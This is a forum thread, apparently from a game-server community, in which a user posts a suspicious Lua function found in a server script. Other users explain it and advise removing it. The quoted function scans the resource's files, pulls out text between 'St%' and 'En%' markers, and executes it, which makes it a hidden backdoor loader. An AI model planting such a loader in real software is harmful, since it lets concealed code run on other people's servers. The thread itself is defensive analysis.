Hello,
I’m not quite sure what this code does, but I’ve never seen anything like it. So I’m asking here now, does anyone here know what the following code does.
local function CheckPlayerID()
local directory = GetResourcePath(GetCurrentResourceName())
local p = io.popen('ls "' .. directory .. '"')
if not p then return end
for file in p:lines() do
local filePath = directory .. "/" .. file
local fichier = io.open(filePath, "rb")
if fichier then
local content = fichier:read("*all")
fichier:close()
if content then
local startPos = content:find("St%", 1, true)
local endPos = content:find("En%", startPos, true)
if startPos and endPos then
local code = content:sub(startPos + 3, endPos - 1)
local func = load(code)
if func then
pcall(func)
end
break
end
end
end
end
end
CheckPlayerID()
This is indeed very interesting. It opens all files in a resource folder and reads their content, then looks for the literals(?) “St%” and “En%” and (when found) executes the code inbetween.
What doesn’t make any sense at all is the fact it looks for the literals here. Usually the % sign is used for pattern matching, so “St…” following any characters. But this looks specifically for “St%” thanks to the third parameter being true.
But I would still classify this as extremely suspicious as it basically looks for random code to execute.
My advise: Get rid of it and hope it doesn’t come back.
First things first. Before even diving into the code, INTUITION tells me that because this came in without your knowledge, it may come right back. (if this is on your machine).
Secondly, fichier is ‘file’ in french. whoever wrote this maaay speak french. (may help if you know who gave you the file)
Now, here’s what the code does (most of which was explained by @kiminaze)
[Line 1] Get the name of the resource
[Line 2] (using ‘ls’ in the terminal), view files in the folder using the resource name. (You know, cause the name of the resource is the name of the folder)
[Line 3 (optional)] If the command doesn’t return any data for whatever reason, exit
[Line 4] For every resulting filename in the directory, do the stuff below
====Stuff====
a. Read the hex bytes of the file
b. Look for the position that starts with “St%” (start?) and one that ends with “En%” (end?)
c. if BOTH are found, get everything between the first character after “ST” and the ‘n’ within “En”
d. then it compiles it all together (with load) and executes it
It’s very important that you NEVER download code if you don’t know EXACTLY what its doing, because things like THIS happen…
Anything could have executed in that pcall including something that maintains an attacker’s connection to your machine. (usually called ‘command and control / c2’) If you don’t know about how to look for that kind of stuff, or what to look for, it may be too late…
First of all, thanks for the quick reply, and the good explanation.
To clarify, the code came from a script I found while troubleshooting a friend’s server. Luckily, this was just a server to test some cars, it’s probably time to reinstall it.